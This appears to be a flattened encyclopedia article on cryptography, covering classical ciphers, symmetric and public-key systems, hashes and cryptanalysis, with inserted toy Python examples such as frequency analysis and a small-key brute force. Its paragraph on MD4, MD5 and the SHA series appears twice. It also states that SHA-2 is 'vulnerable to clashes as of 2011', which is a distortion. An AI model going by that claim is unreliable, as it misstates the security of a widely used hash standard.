Cryptography, or cryptology (from Ancient Greek: κρυπτός, romanized: kryptós, "hidden, secret"; and γράφειν graphein, "to write", or -λογία -logia, "study", respectively[1]), is the practice and study of techniques for secure communication in the presence of adversarial behavior.[2] More generally, cryptography is about constructing and analyzing protocols that prevent third parties or the public from reading private messages.[3] Modern cryptography exists at the intersection of the disciplines of mathematics, computer science, information security, electrical engineering, digital signal processing, physics, and others.[4] Core concepts related to information security (data confidentiality, data integrity, authentication, and non-repudiation) are also central to cryptography.[5] Practical applications of cryptography include electronic commerce, chip-based payment cards, digital currencies, computer passwords, and military communications. Cryptography prior to the modern age was effectively synonymous with encryption, converting readable information (plaintext) to unintelligible nonsense text (ciphertext), which can only be read by reversing the process (decryption). The sender of an encrypted (coded) message shares the decryption (decoding) technique only with the intended recipients to preclude access from adversaries. The cryptography literature often uses the names "Alice" (or "A") for the sender, "Bob" (or "B") for the intended recipient, and "Eve" (or "E") for the eavesdropping adversary.[6] Since the development of rotor cipher machines in World War I and the advent of computers in World War II, cryptography methods have become increasingly complex and their applications more varied. Modern cryptography is heavily based on mathematical theory and computer science practice; cryptographic algorithms are designed around computational hardness assumptions, making such algorithms hard to break in actual practice by any adversary. While it is theoretically possible to break into a well-designed system, it is infeasible in actual practice to do so. Such schemes, if well designed, are therefore termed "computationally secure". Theoretical advances (e.g., improvements in integer factorization algorithms) and faster computing technology require these designs to be continually reevaluated and, if necessary, adapted. Information-theoretically secure schemes that provably cannot be broken even with unlimited computing power, such as the one-time pad, are much more difficult to use in practice than the best theoretically breakable but computationally secure schemes. The growth of cryptographic technology has raised a number of legal issues in the Information Age.
Cryptography's potential for use as a tool for espionage and sedition has led many governments to classify it as a weapon and to limit or even prohibit its use and export.[7] In some jurisdictions where the use of cryptography is legal, laws permit investigators to compel the disclosure of encryption keys for documents relevant to an investigation.[8][9] Cryptography also plays a major role in digital rights management and copyright infringement disputes with regard to digital media.[10] The first use of the term "cryptograph" (as opposed to "cryptogram") dates back to the 19th century—originating from "The Gold-Bug", a story by Edgar Allan Poe.[11][12] Until modern times, cryptography referred almost exclusively to "encryption", which is the process of converting ordinary information (called plaintext) into an unintelligible form (called ciphertext).[13] Decryption is the reverse, in other words, moving from the unintelligible ciphertext back to plaintext. A cipher (or cypher) is a pair of algorithms that carry out the encryption and the reversing decryption. The detailed operation of a cipher is controlled both by the algorithm and, in each instance, by a "key". The key is a secret (ideally known only to the communicants), usually a string of characters (ideally short so it can be remembered by the user), which is needed to decrypt the ciphertext. In formal mathematical terms, a "cryptosystem" is the ordered list of elements of finite possible plaintexts, finite possible ciphertexts, finite possible keys, and the encryption and decryption algorithms that correspond to each key. Keys are important both formally and in actual practice, as ciphers without variable keys can be trivially broken with only the knowledge of the cipher used and are therefore useless (or even counter-productive) for most purposes. Historically, ciphers were often used directly for encryption or decryption without additional procedures such as authentication or integrity checks. There are two main types of cryptosystems: symmetric and asymmetric. In symmetric systems, the only ones known until the 1970s, the same secret key encrypts and decrypts a message. Data manipulation in symmetric systems is significantly faster than in asymmetric systems. Asymmetric systems use a "public key" to encrypt a message and a related "private key" to decrypt it. The advantage of asymmetric systems is that the public key can be freely published, allowing parties to establish secure communication without having a shared secret key. In practice, asymmetric systems are used to first exchange a secret key, and then secure communication proceeds via a more efficient symmetric system using that key.[14] Examples of asymmetric systems include Diffie–Hellman key exchange, RSA (Rivest–Shamir–Adleman), ECC (Elliptic Curve Cryptography), and post-quantum cryptography. Secure symmetric algorithms include the commonly used AES (Advanced Encryption Standard), which replaced the older DES (Data Encryption Standard).[15] Insecure symmetric algorithms include children's language-tangling schemes such as Pig Latin or other cant, and all historical cryptographic schemes, however seriously intended, prior to the invention of the one-time pad early in the 20th century. In colloquial use, the term "code" is often used to mean any method of encryption or concealment of meaning. However, in cryptography, code has a more specific meaning: the replacement of a unit of plaintext (i.e., a meaningful word or phrase) with a code word (for example, "wallaby" replaces "attack at dawn").
A cypher, in contrast, is a scheme for changing or substituting an element below such a level (a letter, a syllable, or a pair of letters, etc.) to produce a cyphertext. Cryptanalysis is the term used for the study of methods for obtaining the meaning of encrypted information without access to the key normally required to do so; i.e., it is the study of how to "crack" encryption algorithms or their implementations. Some use the terms "cryptography" and "cryptology" interchangeably in English,[16] while others (including US military practice generally) use "cryptography" to refer specifically to the use and practice of cryptographic techniques and "cryptology" to refer to the combined study of cryptography and cryptanalysis.[17][18] English is more flexible than several other languages, in which "cryptology" (done by cryptologists) is always used in the second sense above. RFC 2828 advises that steganography is sometimes included in cryptology.[19] The study of characteristics of languages that have some application in cryptography or cryptology (e.g., frequency data, letter combinations, universal patterns, etc.) is called cryptolinguistics. Cryptolinguistics is especially used in military intelligence applications for deciphering foreign communications.[20][21] Before the modern era, cryptography focused on message confidentiality (i.e., encryption)—conversion of messages from a comprehensible form into an incomprehensible one and back again at the other end, rendering it unreadable by interceptors or eavesdroppers without secret knowledge (namely the key needed for decryption of that message). Encryption attempted to ensure secrecy in communications, such as those of spies, military leaders, and diplomats. In recent decades, the field has expanded beyond confidentiality concerns to include techniques for message integrity checking, sender/receiver identity authentication, digital signatures, interactive proofs and secure computation, among others. The main classical cipher types are transposition ciphers, which rearrange the order of letters in a message (e.g., 'hello world' becomes 'ehlol owrdl' in a trivially simple rearrangement scheme), and substitution ciphers, which systematically replace letters or groups of letters with other letters or groups of letters (e.g., 'fly at once' becomes 'gmz bu podf' by replacing each letter with the one following it in the Latin alphabet).[22] Simple versions of either have never offered much confidentiality from enterprising opponents. An early substitution cipher was the Caesar cipher, in which each letter in the plaintext was replaced by a letter some fixed number of positions further down the alphabet.[23] Suetonius reports that Julius Caesar used it with a shift of three to communicate with his generals. Atbash is an example of an early Hebrew cipher. The earliest known use of cryptography is some carved ciphertext on stone in Egypt (c. 1900 BCE), but this may have been done for the amusement of literate observers rather than as a way of concealing information. The Greeks of Classical times are said to have known of ciphers (e.g., the scytale transposition cipher claimed to have been used by the Spartan military).[24] Steganography (i.e., hiding even the existence of a message so as to keep it confidential) was also first developed in ancient times.
An early example, from Herodotus, was a message tattooed on a slave's shaved head and concealed under the regrown hair.[13] Other steganography methods involve 'hiding in plain sight,' such as using a music cipher to disguise an encrypted message within a regular piece of sheet music. More modern examples of steganography include the use of invisible ink, microdots, and digital watermarks to conceal information. In India, the 2000-year-old Kama Sutra of Vātsyāyana speaks of two different kinds of ciphers called Kautiliyam and Mulavediya. In the Kautiliyam, the cipher letter substitutions are based on phonetic relations, such as vowels becoming consonants. In the Mulavediya, the cipher alphabet consists of pairing letters and using the reciprocal ones.[13] In Sassanid Persia, there were two secret scripts, according to the Muslim author Ibn al-Nadim: the šāh-dabīrīya (literally "King's script"), which was used for official correspondence, and the rāz-saharīya, which was used to communicate secret messages with other countries.[25] David Kahn notes in The Codebreakers that modern cryptology originated among the Arabs, the first people to systematically document cryptanalytic methods.[26] Al-Khalil (717–786) wrote the Book of Cryptographic Messages, which contains the first use of permutations and combinations to list all possible Arabic words with and without vowels.[27] Ciphertexts produced by a classical cipher (and some modern ciphers) will reveal statistical information about the plaintext, and that information can often be used to break the cipher. After the discovery of frequency analysis, nearly all such ciphers could be broken by an informed attacker.[28] Such classical ciphers still enjoy popularity today, though mostly as puzzles (see cryptogram). The Arab mathematician and polymath Al-Kindi wrote a book on cryptography entitled Risalah fi Istikhraj al-Mu'amma (Manuscript for the Deciphering of Cryptographic Messages), which described the first known use of frequency analysis cryptanalysis techniques.[29][30] Language letter frequencies may offer little help for some extended historical encryption techniques such as homophonic ciphers, which tend to flatten the frequency distribution. For those ciphers, language letter group (or n-gram) frequencies may provide an attack. Essentially all ciphers remained vulnerable to cryptanalysis using the frequency analysis technique until the development of the polyalphabetic cipher, most clearly by Leon Battista Alberti around the year 1467, though there is some indication that it was already known to Al-Kindi.[30] Alberti's innovation was to use different ciphers (i.e., substitution alphabets) for various parts of a message (perhaps for each successive plaintext letter at the limit). He also invented what was probably the first automatic cipher device, a wheel that implemented a partial realization of his invention. In the Vigenère cipher, a polyalphabetic cipher, encryption uses a key word, which controls letter substitution depending on which letter of the key word is used. In the mid-19th century Charles Babbage showed that the Vigenère cipher was vulnerable to Kasiski examination, but this was first published about ten years later by Friedrich Kasiski.[31] Although frequency analysis can be a powerful and general technique against many ciphers, encryption has still often been effective in practice, as many a would-be cryptanalyst was unaware of the technique.
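As a toy illustration of the ideas above (a hypothetical sketch, not from the article): a Caesar-style shift cipher and a naive frequency-analysis attack that recovers the shift by assuming the most common ciphertext letter corresponds to 'e', the most frequent letter in English.

```python
# Toy sketch (illustrative only): a Caesar shift cipher and a naive
# frequency-analysis attack, as described above. Not secure.
from collections import Counter
import string

def caesar_encrypt(plaintext: str, shift: int) -> str:
    """Shift each letter 'shift' positions down the Latin alphabet."""
    out = []
    for ch in plaintext.lower():
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - ord('a') + shift) % 26 + ord('a')))
        else:
            out.append(ch)  # leave spaces and punctuation untouched
    return ''.join(out)

def break_caesar(ciphertext: str) -> int:
    """Guess the shift by assuming the most frequent letter encrypts 'e'."""
    letters = [c for c in ciphertext if c in string.ascii_lowercase]
    most_common = Counter(letters).most_common(1)[0][0]
    return (ord(most_common) - ord('e')) % 26

msg = "the quick brown fox jumps over the lazy dog meets the eager beaver"
ct = caesar_encrypt(msg, 3)
guessed = break_caesar(ct)
print(ct)
print("guessed shift:", guessed)      # likely 3 for English-like text
print(caesar_encrypt(ct, -guessed))   # decrypt with the guessed shift
```

The attack needs no key at all, only the statistical fingerprint of the plaintext language, which is exactly why polyalphabetic ciphers were such an advance.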
Breaking a message without using frequency analysis essentially required knowledge of the cipher used and perhaps of the key involved, thus making espionage, bribery, burglary, defection, etc., more attractive approaches to the cryptanalytically uninformed. It was finally explicitly recognized in the 19th century that secrecy of a cipher's algorithm is neither a sensible nor a practical safeguard of message security; in fact, it was further realized that any adequate cryptographic scheme (including ciphers) should remain secure even if the adversary fully understands the cipher algorithm itself. Security of the key used should alone be sufficient for a good cipher to maintain confidentiality under an attack. This fundamental principle was first explicitly stated in 1883 by Auguste Kerckhoffs and is generally called Kerckhoffs's Principle; alternatively and more bluntly, it was restated by Claude Shannon, the inventor of information theory and the fundamentals of theoretical cryptography, as Shannon's Maxim—'the enemy knows the system'. Different physical devices and aids have been used to assist with ciphers. One of the earliest may have been the scytale of ancient Greece, a rod supposedly used by the Spartans as an aid for a transposition cipher. In medieval times, other aids were invented, such as the cipher grille, which was also used for a kind of steganography. With the invention of polyalphabetic ciphers came more sophisticated aids such as Alberti's own cipher disk, Johannes Trithemius' tabula recta scheme, and Thomas Jefferson's wheel cypher (not publicly known, and reinvented independently by Bazeries around 1900). Many mechanical encryption/decryption devices were invented early in the 20th century, and several were patented, among them rotor machines—famously including the Enigma machine used by the German government and military from the late 1920s and during World War II.[32] The ciphers implemented by better-quality examples of these machine designs brought about a substantial increase in cryptanalytic difficulty after WWI.[33] Cryptanalysis of the new mechanical ciphering devices proved to be both difficult and laborious. In the United Kingdom, cryptanalytic efforts at Bletchley Park during WWII spurred the development of more efficient means for carrying out repetitive tasks, such as military code breaking (decryption). This culminated in the development of the Colossus, the world's first fully electronic, digital, programmable computer, which assisted in the decryption of ciphers generated by the German Army's Lorenz SZ40/42 machine. Extensive open academic research into cryptography is relatively recent, beginning in the mid-1970s. In the early 1970s IBM personnel designed the Data Encryption Standard (DES) algorithm that became the first federal government cryptography standard in the United States.[34] In 1976 Whitfield Diffie and Martin Hellman published the Diffie–Hellman key exchange algorithm.[35] In 1977 the RSA algorithm was published in Martin Gardner's Scientific American column.[36] Since then, cryptography has become a widely used tool in communications, computer networks, and computer security generally. Some modern cryptographic techniques can only keep their keys secret if certain mathematical problems are intractable, such as the integer factorization or the discrete logarithm problems, so there are deep connections with abstract mathematics. There are very few cryptosystems that are proven to be unconditionally secure. The one-time pad is one, and was proven to be so by Claude Shannon.
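The one-time pad just mentioned is simple enough to sketch directly. The following hypothetical snippet (an illustration, not part of the article) XORs a message with a truly random key of the same length; the same operation decrypts, and the security argument collapses if the key is ever reused.

```python
# Toy sketch of the one-time pad: XOR the message with a random key
# of equal length. Reusing the key destroys the security guarantee.
import secrets

def otp_encrypt(message: bytes, key: bytes) -> bytes:
    assert len(key) == len(message), "key must be as long as the message"
    return bytes(m ^ k for m, k in zip(message, key))

# Decryption is the same XOR operation.
otp_decrypt = otp_encrypt

plaintext = b"attack at dawn"
key = secrets.token_bytes(len(plaintext))   # truly random, used once
ciphertext = otp_encrypt(plaintext, key)
print(ciphertext.hex())
print(otp_decrypt(ciphertext, key))         # b'attack at dawn'
```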
There are a few important algorithms that have been proven secure under certain assumptions. For example, the infeasibility of factoring extremely large integers is the basis for believing that RSA, and some other systems, are secure, but even so, proof of unbreakability is unavailable since the underlying mathematical problem remains open. In practice, these are widely used, and are believed unbreakable in practice by most competent observers. There are systems similar to RSA, such as one by Michael O. Rabin, that are provably secure provided factoring n = pq is impossible; however, it is quite unusable in practice. The discrete logarithm problem is the basis for believing some other cryptosystems are secure, and again, there are related, less practical systems that are provably secure relative to the solvability or insolvability of the discrete log problem.[37] As well as being aware of cryptographic history, cryptographic algorithm and system designers must also sensibly consider probable future developments while working on their designs. For instance, continuous improvements in computer processing power have increased the scope of brute-force attacks, so the required key lengths are similarly advancing.[38] The potential impact of quantum computing is already being considered by some cryptographic system designers developing post-quantum cryptography. The announced imminence of small implementations of these machines may be making the need for preemptive caution rather more than merely speculative.[5] Claude Shannon's two papers, his 1948 paper on information theory, and especially his 1949 paper on cryptography, laid the foundations of modern cryptography and provided a mathematical basis for future cryptography.[39][40] His 1949 paper has been noted as having provided a "solid theoretical basis for cryptography and for cryptanalysis",[41] and as having turned cryptography from an "art to a science".[42] As a result of his contributions and work, he has been described as the "founding father of modern cryptography".[43] Prior to the early 20th century, cryptography was mainly concerned with linguistic and lexicographic patterns. Since then cryptography has broadened in scope, and now makes extensive use of mathematical subdisciplines, including information theory, computational complexity, statistics, combinatorics, abstract algebra, number theory, and finite mathematics.[44] Cryptography is also a branch of engineering, but an unusual one since it deals with active, intelligent, and malevolent opposition; other kinds of engineering (e.g., civil or chemical engineering) need deal only with neutral natural forces. There is also active research examining the relationship between cryptographic problems and quantum physics. Just as the development of digital computers and electronics helped in cryptanalysis, it made possible much more complex ciphers. Furthermore, computers allowed for the encryption of any kind of data representable in any binary format, unlike classical ciphers which only encrypted written language texts; this was new and significant. Computer use has thus supplanted linguistic cryptography, both for cipher design and cryptanalysis. Many computer ciphers can be characterized by their operation on binary bit sequences (sometimes in groups or blocks), unlike classical and mechanical schemes, which generally manipulate traditional characters (i.e., letters and digits) directly.
However, computers have also assisted cryptanalysis, which has compensated to some extent for increased cipher complexity. Nonetheless, good modern ciphers have stayed ahead of cryptanalysis; it is typically the case that use of a quality cipher is very efficient (i.e., fast and requiring few resources, such as memory or CPU capability), while breaking it requires an effort many orders of magnitude larger, and vastly larger than that required for any classical cipher, making cryptanalysis so inefficient and impractical as to be effectively impossible. Symmetric-key cryptography refers to encryption methods in which both the sender and receiver share the same key (or, less commonly, in which their keys are different, but related in an easily computable way). This was the only kind of encryption publicly known until June 1976.[35] Symmetric key ciphers are implemented as either block ciphers or stream ciphers. A block cipher enciphers input in blocks of plaintext as opposed to individual characters, the input form used by a stream cipher. The Data Encryption Standard (DES) and the Advanced Encryption Standard (AES) are block cipher designs that have been designated cryptography standards by the US government (though DES's designation was finally withdrawn after the AES was adopted).[45] Despite its deprecation as an official standard, DES (especially its still-approved and much more secure triple-DES variant) remains quite popular; it is used across a wide range of applications, from ATM encryption[46] to e-mail privacy[47] and secure remote access.[48] Many other block ciphers have been designed and released, with considerable variation in quality. Many, even some designed by capable practitioners, have been thoroughly broken, such as FEAL.[5][49] Stream ciphers, in contrast to the 'block' type, create an arbitrarily long stream of key material, which is combined with the plaintext bit-by-bit or character-by-character, somewhat like the one-time pad. In a stream cipher, the output stream is created based on a hidden internal state that changes as the cipher operates. That internal state is initially set up using the secret key material. RC4 is a widely used stream cipher.[5] Block ciphers can be used as stream ciphers by generating blocks of a keystream (in place of a pseudorandom number generator) and applying an XOR operation to each bit of the plaintext with each bit of the keystream.[50] Message authentication codes (MACs) are much like cryptographic hash functions, except that a secret key can be used to authenticate the hash value upon receipt;[5][51] this additional complication blocks an attack scheme against bare digest algorithms, and so has been thought worth the effort. Cryptographic hash functions are a third type of cryptographic algorithm. They take a message of any length as input, and output a short, fixed-length hash, which can be used in (for example) a digital signature. For good hash functions, an attacker cannot find two messages that produce the same hash. MD4 is a long-used hash function that is now broken; MD5, a strengthened variant of MD4, is also widely used but broken in practice.
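To make the hash/MAC distinction above concrete, here is a small hypothetical sketch (not from the article) using Python's standard library: a bare SHA-256 digest can be recomputed by anyone, whereas an HMAC over the same message can only be produced and verified by someone holding the secret key.

```python
# Toy sketch: a bare hash versus a keyed MAC (HMAC), as contrasted above.
import hashlib, hmac, secrets

message = b"pay 100 to bob"

# Anyone can compute the bare digest, so it proves nothing about the sender.
digest = hashlib.sha256(message).hexdigest()

# An HMAC additionally mixes in a secret key shared by sender and receiver.
key = secrets.token_bytes(32)
tag = hmac.new(key, message, hashlib.sha256).hexdigest()

def verify(key: bytes, message: bytes, received_tag: str) -> bool:
    expected = hmac.new(key, message, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, received_tag)  # constant-time compare

print(digest)
print(tag)
print(verify(key, message, tag))               # True
print(verify(key, b"pay 999 to eve", tag))     # False: message was altered
```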
The US National Security Agency developed the Secure Hash Algorithm series of MD5-like hash functions: SHA-0 was a flawed algorithm that the agency withdrew; SHA-1 is widely deployed and more secure than MD5, but cryptanalysts have identified attacks against it; the SHA-2 family improves on SHA-1, but is vulnerable to clashes as of 2011; and the US standards authority thought it "prudent" from a security perspective to develop a new standard to "significantly improve the robustness of NIST's overall hash algorithm toolkit."[52] Thus, a hash function design competition was meant to select a new U.S. national standard, to be called SHA-3, by 2012. The competition ended on October 2, 2012, when NIST announced that Keccak would be the new SHA-3 hash algorithm.[53] Unlike block and stream ciphers that are invertible, cryptographic hash functions produce a hashed output that cannot be used to retrieve the original input data. Cryptographic hash functions are used to verify the authenticity of data retrieved from an untrusted source or to add a layer of security. Symmetric-key cryptosystems use the same key for encryption and decryption of a message, although a message or group of messages can have a different key than others. A significant disadvantage of symmetric ciphers is the key management necessary to use them securely. Each distinct pair of communicating parties must, ideally, share a different key, and perhaps for each ciphertext exchanged as well. The number of keys required increases as the square of the number of network members, which very quickly requires complex key management schemes to keep them all consistent and secret. In a groundbreaking 1976 paper, Whitfield Diffie and Martin Hellman proposed the notion of public-key (also, more generally, called asymmetric-key) cryptography in which two different but mathematically related keys are used—a public key and a private key.[54] A public-key system is so constructed that calculation of one key (the 'private key') is computationally infeasible from the other (the 'public key'), even though they are necessarily related. Instead, both keys are generated secretly, as an interrelated pair.[55] The historian David Kahn described public-key cryptography as "the most revolutionary new concept in the field since polyalphabetic substitution emerged in the Renaissance".[56] In public-key cryptosystems, the public key may be freely distributed, while its paired private key must remain secret. In a public-key encryption system, the public key is used for encryption, while the private or secret key is used for decryption. While Diffie and Hellman could not find such a system, they showed that public-key cryptography was indeed possible by presenting the Diffie–Hellman key exchange protocol, a solution that is now widely used in secure communications to allow two parties to secretly agree on a shared encryption key.[35] The X.509 standard defines the most commonly used format for public key certificates.[57] Diffie and Hellman's publication sparked widespread academic efforts in finding a practical public-key encryption system. This race was finally won in 1978 by Ronald Rivest, Adi Shamir, and Len Adleman, whose solution has since become known as the RSA algorithm.[58] The Diffie–Hellman and RSA algorithms, in addition to being the first publicly known examples of high-quality public-key algorithms, have been among the most widely used. Other asymmetric-key algorithms include the Cramer–Shoup cryptosystem, ElGamal encryption, and various elliptic curve techniques.
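A minimal numeric sketch of the Diffie–Hellman exchange described above (illustrative only; the modulus and generator below are hypothetical toy parameters, far too small for real use): each party combines its own secret exponent with the other's public value, and both arrive at the same shared key.

```python
# Toy Diffie–Hellman sketch with deliberately tiny, insecure parameters.
# Real deployments use groups of 2048 bits or more (or elliptic curves).
import secrets

p = 0xFFFFFFFB  # small prime modulus (illustrative only)
g = 5           # group element used as the base (assumed for this sketch)

# Each party picks a private exponent and publishes g^x mod p.
a = secrets.randbelow(p - 2) + 1
b = secrets.randbelow(p - 2) + 1
A = pow(g, a, p)   # Alice's public value
B = pow(g, b, p)   # Bob's public value

# Each side combines its own secret with the other's public value.
shared_alice = pow(B, a, p)
shared_bob = pow(A, b, p)
assert shared_alice == shared_bob   # both derive the same shared secret
print(hex(shared_alice))
```

An eavesdropper who sees only p, g, A, and B must solve a discrete logarithm to recover the shared secret, which is the hardness assumption the protocol rests on.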
A document published in 1997 by the Government Communications Headquarters (GCHQ), a British intelligence organization, revealed that cryptographers at GCHQ had anticipated several academic developments.[59] Reportedly, around 1970, James H. Ellis had conceived the principles of asymmetric key cryptography. In 1973, Clifford Cocks invented a solution that was very similar in design rationale to RSA.[59][60] In 1974, Malcolm J. Williamson is claimed to have developed the Diffie–Hellman key exchange.[61] Public-key cryptography is also used for implementing digital signature schemes. A digital signature is reminiscent of an ordinary signature; they both have the characteristic of being easy for a user to produce, but difficult for anyone else to forge. Digital signatures can also be permanently tied to the content of the message being signed; they cannot then be 'moved' from one document to another, for any attempt will be detectable. In digital signature schemes, there are two algorithms: one for signing, in which a secret key is used to process the message (or a hash of the message, or both), and one for verification, in which the matching public key is used with the message to check the validity of the signature. RSA and DSA are two of the most popular digital signature schemes. Digital signatures are central to the operation of public key infrastructures and many network security schemes (e.g., SSL/TLS, many VPNs, etc.).[49] Public-key algorithms are most often based on the computational complexity of "hard" problems, often from number theory. For example, the hardness of RSA is related to the integer factorization problem, while Diffie–Hellman and DSA are related to the discrete logarithm problem. The security of elliptic curve cryptography is based on number theoretic problems involving elliptic curves. Because of the difficulty of the underlying problems, most public-key algorithms involve operations such as modular multiplication and exponentiation, which are much more computationally expensive than the techniques used in most block ciphers, especially with typical key sizes. As a result, public-key cryptosystems are commonly hybrid cryptosystems, in which a fast, high-quality symmetric-key encryption algorithm is used for the message itself, while the relevant symmetric key is sent with the message, but encrypted using a public-key algorithm. Similarly, hybrid signature schemes are often used, in which a cryptographic hash function is computed, and only the resulting hash is digitally signed.[5] Cryptographic hash functions are functions that take a variable-length input and return a fixed-length output, which can be used in, for example, a digital signature. For a hash function to be secure, it must be difficult to compute two inputs that hash to the same value (collision resistance) and to compute an input that hashes to a given output (preimage resistance). MD4 is a long-used hash function that is now broken; MD5, a strengthened variant of MD4, is also widely used but broken in practice.
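The hash-then-sign pattern described above can be sketched with textbook RSA. The following is a hypothetical, deliberately tiny example (the primes and exponents are for illustration only, with no padding and no real security): the message is hashed, the hash is "signed" with the private exponent, and anyone holding the public key can verify the result.

```python
# Toy "hash-then-sign" sketch using textbook RSA with tiny primes.
# Illustrative only: real RSA uses large primes and proper padding (e.g., PSS).
import hashlib

p, q = 61, 53                 # tiny primes (insecure, for illustration)
n = p * q                     # public modulus
phi = (p - 1) * (q - 1)
e = 17                        # public exponent
d = pow(e, -1, phi)           # private exponent (modular inverse of e)

def sign(message: bytes) -> int:
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(h, d, n)       # apply the private key to the (reduced) hash

def verify(message: bytes, signature: int) -> bool:
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(signature, e, n) == h

msg = b"release the funds"
sig = sign(msg)
print(verify(msg, sig))                    # True
print(verify(b"release more funds", sig))  # almost certainly False
```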
The US National Security Agency developed the Secure Hash Algorithm series of MD5-like hash functions: SHA-0 was a flawed algorithm that the agency withdrew; SHA-1 is widely deployed and more secure than MD5, but cryptanalysts have identified attacks against it; the SHA-2 family improves on SHA-1, but is vulnerable to clashes as of 2011; and the US standards authority thought it "prudent" from a security perspective to develop a new standard to "significantly improve the robustness of NIST's overall hash algorithm toolkit."[52] Thus, a hash function design competition was meant to select a new U.S. national standard, to be called SHA-3, by 2012. The competition ended on October 2, 2012, when NIST announced that Keccak would be the new SHA-3 hash algorithm.[53] Unlike block and stream ciphers that are invertible, cryptographic hash functions produce a hashed output that cannot be used to retrieve the original input data. Cryptographic hash functions are used to verify the authenticity of data retrieved from an untrusted source or to add a layer of security. The goal of cryptanalysis is to find some weakness or insecurity in a cryptographic scheme, thus permitting its subversion or evasion. It is a common misconception that every encryption method can be broken. In connection with his WWII work at Bell Labs, Claude Shannon proved that the one-time pad cipher is unbreakable, provided the key material is truly random, never reused, kept secret from all possible attackers, and of equal or greater length than the message.[62] Most ciphers, apart from the one-time pad, can be broken with enough computational effort by brute force attack, but the amount of effort needed may be exponentially dependent on the key size, as compared to the effort needed to make use of the cipher. In such cases, effective security could be achieved if it is proven that the effort required (i.e., "work factor", in Shannon's terms) is beyond the ability of any adversary. This means it must be shown that no efficient method (as opposed to the time-consuming brute force method) can be found to break the cipher. Since no such proof has been found to date, the one-time pad remains the only theoretically unbreakable cipher. Although well-implemented one-time-pad encryption cannot be broken, traffic analysis is still possible. There are a wide variety of cryptanalytic attacks, and they can be classified in any of several ways. A common distinction turns on what Eve (an attacker) knows and what capabilities are available. In a ciphertext-only attack, Eve has access only to the ciphertext (good modern cryptosystems are usually effectively immune to ciphertext-only attacks). In a known-plaintext attack, Eve has access to a ciphertext and its corresponding plaintext (or to many such pairs). In a chosen-plaintext attack, Eve may choose a plaintext and learn its corresponding ciphertext (perhaps many times); an example is gardening, used by the British during WWII. In a chosen-ciphertext attack, Eve may be able to choose ciphertexts and learn their corresponding plaintexts.[5] Finally, in a man-in-the-middle attack, Eve gets in between Alice (the sender) and Bob (the recipient), accesses and modifies the traffic, and then forwards it to the recipient.[63] Also important, often overwhelmingly so, are mistakes (generally in the design or use of one of the protocols involved).
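As a concrete (and purely hypothetical) illustration of the known-plaintext model and of brute force, the sketch below attacks a toy cipher whose entire key space is only 2^16 values; the attacker, who knows one plaintext/ciphertext pair, simply tries every key. Real ciphers defeat the same approach by using key spaces of 2^128 and beyond.

```python
# Toy known-plaintext brute-force attack on a deliberately weak cipher
# with a 16-bit key. Illustrative only.
import hashlib

def keystream(key: int, length: int) -> bytes:
    """Derive a keystream from a 16-bit key (toy construction)."""
    stream = b""
    counter = 0
    while len(stream) < length:
        block = key.to_bytes(2, "big") + counter.to_bytes(4, "big")
        stream += hashlib.sha256(block).digest()
        counter += 1
    return stream[:length]

def encrypt(key: int, plaintext: bytes) -> bytes:
    return bytes(p ^ k for p, k in zip(plaintext, keystream(key, len(plaintext))))

secret_key = 0x2A17                 # unknown to the attacker
known_plain = b"HELLO BOB"          # Eve knows this pair...
known_cipher = encrypt(secret_key, known_plain)

# ...so she tries all 2**16 keys until one reproduces the known ciphertext.
recovered = next(k for k in range(2**16)
                 if encrypt(k, known_plain) == known_cipher)
print(hex(recovered))               # 0x2a17
```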
Cryptanalysis of symmetric-key ciphers typically involves looking for attacks against the block ciphers or stream ciphers that are more efficient than any attack that could be mounted against a perfect cipher. For example, a simple brute force attack against DES requires one known plaintext and 2^55 decryptions, trying approximately half of the possible keys, to reach a point at which chances are better than even that the key sought will have been found. But this may not be enough assurance; a linear cryptanalysis attack against DES requires 2^43 known plaintexts (with their corresponding ciphertexts) and approximately 2^43 DES operations.[64] This is a considerable improvement over brute force attacks. Public-key algorithms are based on the computational difficulty of various problems. The most famous of these are the difficulty of integer factorization of semiprimes and the difficulty of calculating discrete logarithms, both of which are not yet proven to be solvable in polynomial time (P) using only a classical Turing-complete computer. Much public-key cryptanalysis concerns designing algorithms in P that can solve these problems, or using other technologies, such as quantum computers. For instance, the best-known algorithms for solving the elliptic curve-based version of discrete logarithm are much more time-consuming than the best-known algorithms for factoring, at least for problems of more or less equivalent size. Thus, to achieve an equivalent strength of encryption, techniques that depend upon the difficulty of factoring large composite numbers, such as the RSA cryptosystem, require larger keys than elliptic curve techniques. For this reason, public-key cryptosystems based on elliptic curves have become popular since their invention in the mid-1990s. While pure cryptanalysis uses weaknesses in the algorithms themselves, other attacks on cryptosystems are based on actual use of the algorithms in real devices, and are called side-channel attacks. If a cryptanalyst has access to, for example, the amount of time the device took to encrypt a number of plaintexts or report an error in a password or PIN character, they may be able to use a timing attack to break a cipher that is otherwise resistant to analysis. An attacker might also study the pattern and length of messages to derive valuable information; this is known as traffic analysis[65] and can be quite useful to an alert adversary. Poor administration of a cryptosystem, such as permitting too-short keys, will make any system vulnerable, regardless of other virtues. Social engineering and other attacks against humans (e.g., bribery, extortion, blackmail, espionage, rubber-hose cryptanalysis or torture) are usually employed due to being more cost-effective and feasible to perform in a reasonable amount of time compared to pure cryptanalysis by a high margin. Much of the theoretical work in cryptography concerns cryptographic primitives—algorithms with basic cryptographic properties—and their relationship to other cryptographic problems. More complicated cryptographic tools are then built from these basic primitives. These primitives provide fundamental properties, which are used to develop more complex tools called cryptosystems or cryptographic protocols, which guarantee one or more high-level security properties. Note, however, that the distinction between cryptographic primitives and cryptosystems is quite arbitrary; for example, the RSA algorithm is sometimes considered a cryptosystem, and sometimes a primitive.
